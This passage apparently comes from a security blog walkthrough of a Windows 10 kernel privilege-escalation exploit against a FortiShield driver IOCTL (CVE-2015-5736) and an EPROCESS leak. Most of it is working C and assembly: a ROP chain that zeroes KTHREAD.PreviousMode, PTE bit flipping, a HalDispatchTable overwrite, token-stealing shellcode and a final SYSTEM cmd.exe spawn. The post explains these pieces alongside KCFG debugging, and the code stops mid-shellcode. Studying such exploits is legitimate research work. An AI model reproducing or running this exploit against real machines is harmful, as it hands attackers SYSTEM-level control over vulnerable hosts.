This chunk allocates the fake stack for the stack pivot and builds the ROP chain. This chain was written by Morten Schenk and Sickness. The chain is similar to the one for the POC on exploit-db but is tailored to work with Windows 10 20H2. We initially use a ROP gadget mov esp, 0xB60F0020 later in the code when we trigger the CVE-2015-5736 vulnerable IOCTL to pivot the stack to our ROP chain at the user-mode address we allocate in the allocate_fake_stack() function. We are able to use the gadget as the stack pivot because it moves a value into esp that can also be a valid user-mode address that we can allocate. That is why the ROP chain starts with allocating a user-mode address space that contains that address. The ROP chain sets the PreviousMode in our KTHREAD to 0 to enable us to use ReadProcessMemoryand NtWriteVirtualMemory as read and write primitives. As a reminder, this works due to a PreviousMode of zero tricking the kernel in to thinking the parameters passed to ReadProcessMemory and NtWriteVirtualMemory came from a kernel-mode call instead of a user-mode call. Thus it enables the read/write primitives because a call to ReadProcessMemory in a kernel-mode thread is allowed to read kernel-mode memory and a call to NtWriteWirtualMemory in a kernel-mode thread is allowed to write to kernel-mode memory. The ROP chain also restores the stack and registers to allow execution to continue instead of crashing after we have finished changeing PreviousMode with our hijacked callback to the ROP chain with the vulnerable CVE-2015-5736 IOCTL. This chunk also contains the get_pxe_address_64() function that will return the PTE for the supplied virtual address given the PTE start address we pull later in the code. This allows us to enumerate the PTE for a virtual address to flip bits such as the U/S or NX bits.

PULONGLONG allocate_fake_stack(ULONGLONG ntBase, ULONGLONG fortishield_callback, ULONGLONG fortishield_restore, ULONGLONG kThread)
{
	PULONGLONG fake_stack = (PULONGLONG)VirtualAlloc((LPVOID)0x00000000B60E0000, 0x14000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (fake_stack == NULL)
	{
		printf("[!] Error while allocating the fake stack: %d\n", GetLastError());
		exit(1);
	}
	memset(fake_stack, 0x90, 0x14000);

	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x00))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x08))[0] = (ULONGLONG)fortishield_callback;		// Callback address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x10))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x18))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x20))[0] = (ULONGLONG)ntBase + 0x3f01bf;		// pop rax ; pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x28))[0] = (ULONGLONG)kThread + 0x232;			// KTHREAD.PreviousMode
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x30))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x38))[0] = (ULONGLONG)ntBase + 0x49584f;		// mov byte [rax], cl ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x40))[0] = (ULONGLONG)ntBase + 0x2017d0;		// pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x48))[0] = 0x00000000b60f0110;					// Location on fake_stack
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x50))[0] = (ULONGLONG)ntBase + 0x2017f2;		// pop rax ; ret;
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x58))[0] = (ULONGLONG)ntBase + 0x217527;		// mov rax, rcx ; add rsp, 0x28 ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x60))[0] = (ULONGLONG)ntBase + 0x3cd671;		// mov rcx, rsi ; call rax
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x68))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x70))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x78))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x80))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x88))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x90))[0] = 0x0000000000000028;					// Value to subtract to get RSP
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0x98))[0] = (ULONGLONG)ntBase + 0x029db2b;		// sub rax, rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa0))[0] = (ULONGLONG)ntBase + 0x20de71;		// pop rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xa8))[0] = (ULONGLONG)fortishield_restore;		// Restore address
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb0))[0] = (ULONGLONG)ntBase + 0x2dd014;		// mov qword [rax], rcx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xb8))[0] = (ULONGLONG)ntBase + 0x2b82ce;		// mov qword [rbx], rax ; add rsp, 0x20 ; pop rbx ; ret
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xc8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd0))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xd8))[0] = 0x0000000000000000;					// NULL
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe0))[0] = 0x0000000000000000;					// Restore RBX
	((PDWORD64)((DWORD64)fake_stack + 0x10020 + 0xe8))[0] = (ULONGLONG)ntBase + 0x201380;		// pop rsp ; ret
	return fake_stack;
}

ULONGLONG get_pxe_address_64(ULONGLONG address, ULONGLONG pte_start)
{
	ULONGLONG result = address >> 9;
	result = result | pte_start;
	result = result & (pte_start + 0x0000007ffffffff8);
	return result;
}

This is the walkEprocess() function I added to walk the EPROCESS address leaked from CVE-2021-31955 to return the KTHREAD. It takes a handle to the mdare driver to enable the leak of the QWORDs at various addresses and the EPROCESS address you wish to walk to find the KTHREAD.

ULONGLONG walkEprocess(HANDLE driver, ULONGLONG eProcess) {
	DWORD currentTid = GetCurrentThreadId();

	ULONGLONG listHead = eProcess + EPROCESS_ThreadListHead_Offset;
	ULONGLONG flink = leakQWORD(listHead, driver);

	while (flink != listHead) {
		ULONGLONG ethread = flink - ETHREAD_ThreadListEntry_Offset;

		ULONGLONG uniqueTid = leakQWORD(ethread + ETHREAD_Cid_Offset + CLIENTID_UniqueThread_Offset, driver);

		if ((DWORD)uniqueTid == currentTid) {
			ULONGLONG kthread = ethread;  // Tcb is at offset 0x0
			printf("[+] Found current thread:\n");
			printf("[+] ETHREAD: 0x%llx\n", ethread);
			printf("[+] KTHREAD: 0x%llx\n", kthread);
			return kthread;
		}

		flink = leakQWORD(flink, driver);  // Move to next thread
	}

	printf("[-] Current thread not found in EPROCESS thread list.\n");
}

The trigger_callback() function creates some files and then moves them which will trigger the callback we set with the CVE-2015-5736 IOCTL.

int trigger_callback()
{
	printf("[+] Creating dummy file\n");
	system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test.txt");
	printf("[+] Creating dummy file 2\n");
	system("echo test > C:\\Users\\n00b\\AppData\\LocalLow\\test3.txt");
	printf("[+] Calling MoveFileEx()\n");

	BOOL MFEresult = MoveFileEx(L"C:\\Users\\n00b\\AppData\\LocalLow\\test.txt", L"C:\\Users\\n00b\\AppData\\LocalLow\\test2.txt", MOVEFILE_REPLACE_EXISTING);
	if (MFEresult == 0)
	{
		printf("[!] Error while calling MoveFileEx(): %d\n", GetLastError());
		return 1;
	}
	return 0;
}

This chunk is the start of the main() function. It begins with opening handles to the mdare and fortishield drivers.

int main()
{

	HANDLE mdare = CreateFile(L"\\\\.\\mdareDriver_48", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (mdare == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		return 1;
	}

	HANDLE forti = CreateFile(L"\\\\.\\FortiShield", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (forti == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		return 1;
	}

This chunk declares the eProcess variable, sets the name of the exploit to grab the EPROCESS of and passes it to GetEprocessAddress. It then pulls the KTHREAD with the walkEprocess() function and leaks the ntBase address with leakNtBase(). It then sets the stack pivot gadget address to the ntPivot variable and finds the start of the PTE address range by leaking nt!MiGetPteAddress+0x13 offset. We need the base start address of the PTE to find the PTE for our user-mode address space to flip the U/S bit. The PTE base address is randomized on bootup since Windows 10 1709, previous version used a static PTE base address making it easier to find. Windows still needs to know the PTE base address so after it is determined on boot up it is stored at nt!MiGetPteAddress+0x13. The PTE base address is found by doing dqs or u nt!MiGetPteAddress+0x13 in the WinDbg. We then subtract the base address of nt from the address of nt!miGetPteAddress+0x13 to get the offset to use with the read primitive to retrieve the stored PTE base address.

post2-windbg-migetpteaddress

The code chunk then leaks the base address of fortishield with the leakFortiBase() function and sets the fortishield_callback and fortishield_restore variables. These variables are used to hijack and restore execution in the vulnerable fortishield IOCTL.

	ULONGLONG eProcess;
	const char* forti_exploit = "kstack.exe";
	eProcess = GetEprocessAddress(forti_exploit);
	printf("[+] EPROCESS found %p\n", eProcess);
	ULONGLONG kThread = walkEprocess(mdare, eProcess);
	ULONGLONG ntBase = leakNtBase(mdare, kThread);
	printf("[+] ntoskrnl.exe base address is: 0x%llx\n", ntBase);
	ULONGLONG ntPivot = ntBase + 0x20bbc2; // mov esp, 0xB60F0020 ; ret // mov esp, 0xf6000000; retn;
	printf("[+] stack pivot gadget found: 0x%llx\n", ntPivot);
	ULONGLONG ntMiGetPteAddressOffset = leakQWORD(ntBase + 0x33273B, mdare);
	printf("[+] ntMiGetPteAddressOffset is: 0x%llx\n", ntMiGetPteAddressOffset);
	ULONGLONG fortishieldBase = leakFortiBase(mdare, ntBase);
	printf("[+] FortiShield.sys base address is: 0x%llx\n", fortishieldBase);
	ULONGLONG fortishield_callback = fortishieldBase + 0xd150;
	ULONGLONG fortishield_restore = fortishieldBase + 0x2f73;

This chunk then prints the PTE Virtual Address base address and finds the PTE of the fake stack address with get_pxe_address_64 and then allocates the fake stack and builds the ROP chain with allocate_fake_stack().

	printf("[+] PTE VA start address is: 0x%llx\n", ntMiGetPteAddressOffset);


	ULONGLONG pte_result = get_pxe_address_64(0xB60f0000, ntMiGetPteAddressOffset);
	printf("[+] PTE virtual address for 0x0B60F0100: %I64x\n", pte_result);
	PULONGLONG fake_stack = allocate_fake_stack(ntBase, fortishield_callback, fortishield_restore, kThread);

This chunk sets up the call to the vulnerable IOCTL for CVE-2015-5736, calls the IOCTL, and then triggers the callback with trigger_callback(). The getchar() calls allow for delaying the execution of code to help with troubleshooting and debugging. They can be commented out or removed.

	DWORD IoControlCode = 0x220028;
	ULONGLONG InputBuffer = ntPivot;
	DWORD InputBufferLength = 0x8;
	ULONGLONG OutputBuffer = 0x0;
	DWORD OutputBufferLength = 0x0;
	DWORD lpBytesReturned;

	getchar();

	BOOL triggerIOCTL = DeviceIoControl(forti, IoControlCode, (LPVOID)&InputBuffer, InputBufferLength, (LPVOID)&OutputBuffer, OutputBufferLength, &lpBytesReturned, NULL);
	getchar();
	trigger_callback();

This chunk sleeps to ensure that the callback had enouugh time to finish and then allocates user-mode memory at 0x00000002a0000000, uses get_pxe_address64() to retrieve the PTE Virtual Address. It uses ReadProcessMemory to read the value and print it to the screen. It then stores the shellcode in the user-mode memory we allocated and uses the write NtWriteVirtualMemory write primitive to flip the U/S bit to make it appear to be in supervisor mode or kernel-mode.

	Sleep(2000);
	LPVOID read_qword = malloc(sizeof(ULONGLONG));
	SIZE_T read_bytes;
	memset(read_qword, 0x00, sizeof(ULONGLONG));

	PULONGLONG ppte_base = &ntMiGetPteAddressOffset;
	if (ppte_base == 0)
	{
		printf("[!] Error while reading from nt!MiGetPteAddress + 0x13\n");
		exit(1);
	}
	printf("[+] PTE base address: %llx \n", *ppte_base);

	ULONGLONG shellcode = 0x00000002a0000000;
	LPVOID allocation_sc = VirtualAlloc((LPVOID)shellcode, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (allocation_sc == NULL)
	{
		printf("[!] Error while allocating memory for the input buffer: %d\n", GetLastError());
		exit(1);
	}
	memset(allocation_sc, 0x90, 0x1000);

	memcpy((LPVOID)((ULONGLONG)allocation_sc + 0x08), &TokenStealing, 0xc0);
	((PDWORD64)((DWORD64)allocation_sc + 0x80))[0] = fortishield_callback;
	((PDWORD64)((DWORD64)allocation_sc + 0x88))[0] = fortishield_restore;

	ULONGLONG pte_base = (ULONGLONG)*ppte_base;
	ULONGLONG pte_va = get_pxe_address_64(0x00000002a0000000, pte_base);

	memset(read_qword, 0x00, sizeof(ULONGLONG));
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)pte_va, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG ppte_entry = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] PTE flags: %llx \n", *ppte_entry);
	//Flip U/S bit
	ULONGLONG write_what = (ULONGLONG)*ppte_entry ^ 1 << 2;
	_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");
	if (!pNtWriteVirtualMemory)
	{
		printf("[!] Error while resolving NtWriteVirtualMemory: %d\n", GetLastError());
		exit(1);
	}
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)pte_va, &write_what, sizeof(ULONGLONG), NULL);

This chunk uses the read primitive to retrieve the value of HalDispatchTable+0x08 so that we can save the original value that points to HaliQuerySystemInformation. It then saves the address on the fake stack so that the shellcode can reference it when it restores execution following the token steal. It then uses the write primitive to overwrite HalDispathTable+0x08 with the shellcode address and triggers the call to it with NtQueryIntervalProfile. The ULONG trash is just a ULONG variable declared to pass it’s pointer to NtQueryIntervalProfile and serves no other purpose.

	ULONGLONG HaliQuerySystemInformation = (ULONGLONG)ntBase + 0xc00a68;
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)HaliQuerySystemInformation, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG orig_HaliQuerySystemInformation = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] Oringial HaliQuerySystemInformation Address: %llx \n", *orig_HaliQuerySystemInformation);
	((PDWORD64)((DWORD64)fake_stack + 0x10200))[0] = (ULONGLONG)*orig_HaliQuerySystemInformation;

	getchar();
	write_what = (ULONGLONG)shellcode;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	_NtQueryIntervalProfile pNtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
	if (!pNtQueryIntervalProfile)
	{
		printf("[!] Error while resolving NtQueryIntervalProfile: %d\n", GetLastError());
		exit(1);
	}
	ULONG trash;
	pNtQueryIntervalProfile(2, &trash);

This final chunk halts with getchar() to delay execution and then sleeps for 2 seconds, a little redundant but ensures a delay if you just happy click through. It then uses the write primitive to restore the HalDisptachTable+0x08 to HaliQuerySystemInformation and restores the PreviousMode on the KTHREAD before spawning cmd.exe and exiting.

	getchar();
	Sleep(2000);
	//restore the HalDispatchTable
	write_what = (ULONGLONG)*orig_HaliQuerySystemInformation;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	//restore Previous Mode on the KThread
	memset(read_qword, 0x00, sizeof(ULONGLONG));
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kThreadPM = (PULONGLONG)((ULONG_PTR*)read_qword);
	write_what = (ULONGLONG)*kThreadPM ^ 1 << 0;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), &write_what, sizeof(ULONGLONG), NULL);
	system("start cmd.exe");

	return 0;
}

This token stealing shellcode is in the repo token_stealing.asm. The token stealing shell code finds the EPROCESS of our current process and walks the ActiveProcessLink to find the SYSTEM Process with PID 4. It then copies its token over our token. It then restores register values and loads the original HaliQuerySystemInformation address to rax and performs a jmp rax. This restores execution to HaliQuerySystemInformation to avoid a bugcheck if we just return from our shellcode instead of continuing to the legitimate function we hijacked.

_TEXT	SEGMENT

TokenStealing PROC
	get_eproc:
	nop
	nop
	nop
	nop
	nop
	push	rax										;save registers
	push	rcx										;
	push	r9										;
	push	r8										;
	xor     rax, rax								;Get the EPROCESS of current Process
	mov     rax, qword ptr gs:[rax+188h]			;
	mov     rax, qword ptr [rax+0B8h]				;
	mov     r8, rax									;
	parse_eproc:
	mov     rax, qword ptr [rax+448h]				;walk the linked process list to find SYSTEM process
	sub     rax, 448h								;
	mov     rcx, qword ptr [rax+440h]				;
	cmp     rcx, 4									;
	jne     parse_eproc								;
	steal_token:
	mov     r9, qword ptr [rax+4B8h]				;copy SYSTEM process token to current process
	mov     qword ptr [r8+4B8h], r9					;
	pop		r8										;restire registers
	pop		r9										;
	pop		rcx										;
	pop		rax										;we are about to overwrite this one but stack allignment is a thing
	mov		rax, qword ptr [0b60f0200h]				;HaliQuerySystemInformation
	jmp		rax
	ret

TokenStealing ENDP

_TEXT	ENDS

End

If we run this code we will see the VM freeze once it starts perfoming the HalDispatchTable hijack and when we switch to the debugger we see a crash with a 0x139 bugcheck. This was confusing to troubleshoot at first because it mentioned a stack overflow in the full dump from !analyze -v (that detailed dump does not work on my testing VM for this scenario for some reason). The code is actually a KERNEL_SECURITY_CHECK_FAILURE. Arguments 1-3 were null and not relevant in this crash, however, argument 4 showed the user-mode address allocated for the shellcode. post2-bugcheck-run post2-windbg-bugcheck I mentioned earlier in the blog that we are doing this the hard way and that it would be easier to just call the vulnerable CVE-2015-5736 IOCTL again, or double call as I like to call that method. I will briefly go over that to show that we can run shellcode from user-mode addresses with this exploit using other methods as we troubleshoot why we cannot run shellcode from a user-mode address when we use the HalDispatchTable method. If we were to use a double call to the CVE-2015-5736 IOCTL setting the callback to the user-mode address on the second call we would successfully get a SYSTEM command shell without a crash. I’ll save you reading space by not copying the full code here. There is only minor changes in the main() function and the shellcode. You can find the code on the repo doublecall.cpp doublecall.asm Replace the code in the kstack.cpp file with the code from doublecall.cpp and replace the code in token_stealing.asm with the code in doublecall.asm if you want to try it out.

post2-doublecall

We see that we can execute code in kernel-mode from a user-mode memory address if we do the double call to the vulnerable IOCTL so why does it crash if we hijack the HalDispatchTable? Connor McGarr actually gave a talk at BlackHat USA 2025 about CFG (the user-mode version) and KCFG. In it he notes that KCFG acts like software Supervisor Mode Execution Prevention (SMEP). Even if HVCI is disabled KCFG will still act as software SMEP and monitor indirect calls on KCFG protected functions to ensure they never invoke a user-mode address. Connor McGarr BHUSE25

We saw during our RE that KeQueryIntervalProfile had a call to KCFG (guard_dispatch_icall). This monitors the indirect call and since it sees a user-mode address it will initiate a bugcheck and crash the system. This is evident in the call stack (k command in WinDbg). We see from the call stack that nt!KeQueryIntervalProfile+0x3e calls nt!guard_icall_bugcheck+0x1b and then we progress through the bugcheck crash.

post2-ida-kequeryintervalprofile-2

post2-windbg-callstack

So to fix this we either need to pivot to a method that does not include the KCFG indirect call check or use a kernel-mode address to host our shellcode. We already know we can use another call to fortishield to call our shellcode without KCFG interfering so we will search for a kernel-mode address to make the HalDispatchTable hijack work. Again, we must remember that HVCI is disabled in this scenario as it would prevent dynamic code and would not allow kernel memory to be writable and executable at the same time. There is also Mode Based Execution Control (MBEC) which is a hardware feature enabled in the CPU to prevent user-mode addresses that are executable from becoming kernel-mode address. HVCI and VBS require a CPU that supports MBEC to prevent reduced performance, but Windows will not use MBEC if HVCI\VBS are disabled even though it is a hardware based mitigation. HVCI MBEC

To use a kernel-mode address for our shellcode we must either already know the address or be able to leak it. It needs to be writable and executable. We could use the concept of a code cave where we find a null page (0x1000 bytes) in the .text section of a module we do have the address for, which is currently nt and fortishield. We could then use the write primitive to make the page writable to copy our shellcode and the use the write primitive to restore it to Read-only and execute. This could lead to a problem with crashing due to PatchGuard detecting our changes to loaded kernel modules if we are not able to make changes, execute shellcode, and restore everything back to normal.

There is another option though. If we dump our KTHREAD for our exploit in WinDbg and check the stack we can see more than enough unused space towards the stack base to host our shellcode.

post2-windbg-find-kthread

post2-windbg-kstack

Manipulating the KSTACK could cause stability issues or other bugs, but we are only using this executable to run our exploit and elevate our process to SYSTEM by stealing the SYSTEM token. We could write our shellcode close to the base, make it executable, and then write this address to HalDsipatchTable+0x8. After elevating our process to system we would then restore the KSTACK to non-executable, restore the HalDispatchTable, and reset the U/S bit on our KTHREAD and spawn a cmd prompt. We will generate a bugcheck if we attempt to use system(“start cmd.exe”) without resetting the U/S bit as the kernel should not be making a user-mode call to start cmd.exe. This is because we are attempting to call cmd.exe instance from user-mode with system(“start cmd.exe”) while our thread is still marked as kernel-mode. We will notice an access violation in WinDbg because the kernel-mode thread tries to access user-mode address space. If we hit g to continue we will hit a continuous loop of access violations. If we set WinDbg to ignore access violations our exploit just freezes until another process generates a bug check due to the kernel being tied up in the endless access violation loop. We can verify this by commenting out line 530:

	//pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), &write_what, sizeof(ULONGLONG), NULL);

post2-kstack-crash

post2-windbg-access-violation-1

post2-windbg-settings

post2-windbg-access-violation

post2-windbg-kstack-crash

The working code is mostly the same as the original code until line 429 in the main() function. I will only post from 429 down here and you can view the full code in the repo kstack.cpp. The logic is mostly the same, except we do not allocate a user-mode address and flip the U/S bit. Instead we find the Kernel Stack Base (StackBase) from the KTHREAD and subtract 0x100 from it. The value in StackBase is address after the stack ends and could be invalid or belong to something else if it is valid. Trying to read/write to an invalid page will cause a bugcheck. If it is a valid address that belongs to another process or thread then there is no telling what issues it will cause. We store the shellcode in our KSTACK code cave and then make that page executable by enumerating the PTE just like we did for the user-mode address and then flip the NX bit instead of the U/S bit. We then perform our HalDispatchTableHijack and call NtQueryIntervalProfile. After our shellcode runs we restore the HalDispatchTable, reset our U/S bit on the KTHREAD to avoid generating a bugcheck when we spawn cmd.exe as SYSTEM, and then exit thus killing our thread and it’s KSTACK. There are no changes to the shellcode from the previously listed token_stealing.asm for the bugcheck.cpp earlier in the post. It’s copied below so you don’t have to scroll up for it. token_stealing.asm

	ULONGLONG pte_base = (ULONGLONG)*ppte_base;
	_NtWriteVirtualMemory pNtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory");
	if (!pNtWriteVirtualMemory)
	{
		printf("[!] Error while resolving NtWriteVirtualMemory: %d\n", GetLastError());
		exit(1);
	}
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x38), read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kStack = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] KSTACK Base Address: %llx \n", *kStack);

	ULONGLONG kStackB = ((ULONGLONG)*kStack - 0x100);
	ULONGLONG* tokensteal = (ULONGLONG*)TokenStealing;
	ULONGLONG write_what = (ULONGLONG)tokensteal[0];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)kStackB, &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[1];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x08), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[2];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x10), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[3];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x18), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[4];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x20), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[5];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x28), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[6];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x30), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[7];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x38), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[8];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x40), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[9];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x48), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[10];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x50), &write_what, sizeof(ULONGLONG), NULL);
	write_what = (ULONGLONG)tokensteal[11];
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStackB + 0x58), &write_what, sizeof(ULONGLONG), NULL);
	getchar();
	//Flip NX bit on Kstack
	ULONGLONG kStack_pteva = get_pxe_address_64(kStackB, pte_base);
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)kStack_pteva, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kStack_pteEntry = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] KSTACK PTE Entry: %llx \n", *kStack_pteEntry);
	getchar();
	write_what = (ULONGLONG)*kStack_pteEntry ^ (1ULL << 63);
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kStack_pteva), &write_what, sizeof(ULONGLONG), NULL);

	ULONGLONG HaliQuerySystemInformation = (ULONGLONG)ntBase + 0xc00a68;
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)HaliQuerySystemInformation, read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG orig_HaliQuerySystemInformation = (PULONGLONG)((ULONG_PTR*)read_qword);
	printf("[+] Oringial HaliQuerySystemInformation Address: %llx \n", *orig_HaliQuerySystemInformation);
	((PDWORD64)((DWORD64)fake_stack + 0x10200))[0] = (ULONGLONG)*orig_HaliQuerySystemInformation;

	getchar();
	write_what = (ULONGLONG)kStackB;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	_NtQueryIntervalProfile pNtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
	if (!pNtQueryIntervalProfile)
	{
		printf("[!] Error while resolving NtQueryIntervalProfile: %d\n", GetLastError());
		exit(1);
	}
	ULONG trash;
	pNtQueryIntervalProfile(2, &trash);
	getchar();
	Sleep(2000);
	//restore the HalDispatchTable
	write_what = (ULONGLONG)*orig_HaliQuerySystemInformation;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)HaliQuerySystemInformation), &write_what, sizeof(ULONGLONG), NULL);
	//restore Previous Mode on the KThread
	memset(read_qword, 0x00, sizeof(ULONGLONG));
	if (!ReadProcessMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), read_qword, sizeof(ULONGLONG), &read_bytes))
	{
		printf("[!] Error while calling ReadProcessMemory(): %d\n", GetLastError());
	}
	PULONGLONG kThreadPM = (PULONGLONG)((ULONG_PTR*)read_qword);
	write_what = (ULONGLONG)*kThreadPM ^ 1 << 0;
	pNtWriteVirtualMemory(GetCurrentProcess(), (LPVOID)((ULONGLONG)kThread + 0x232), &write_what, sizeof(ULONGLONG), NULL);
	system("start cmd.exe");

	return 0;

}

_TEXT	SEGMENT

TokenStealing PROC
	get_eproc:
	nop
	nop
	nop
	nop
	nop
	push	rax										;save registers
	push	rcx										;
	push	r9										;
	push	r8										;
	xor     rax, rax								;Get the EPROCESS of current Process
	mov     rax, qword ptr gs:[rax+188h]			;
	mov     rax, qword ptr [rax+0B8h]				;
	mov     r8, rax									;
	parse_eproc:
	mov     rax, qword ptr [rax+448h]				;walk the linked process list to find SYSTEM process
	sub     rax, 448h								;
	mov     rcx, qword ptr [rax+440h]				;
	cmp     rcx, 4									;
	jne     parse_eproc								;
	steal_token:
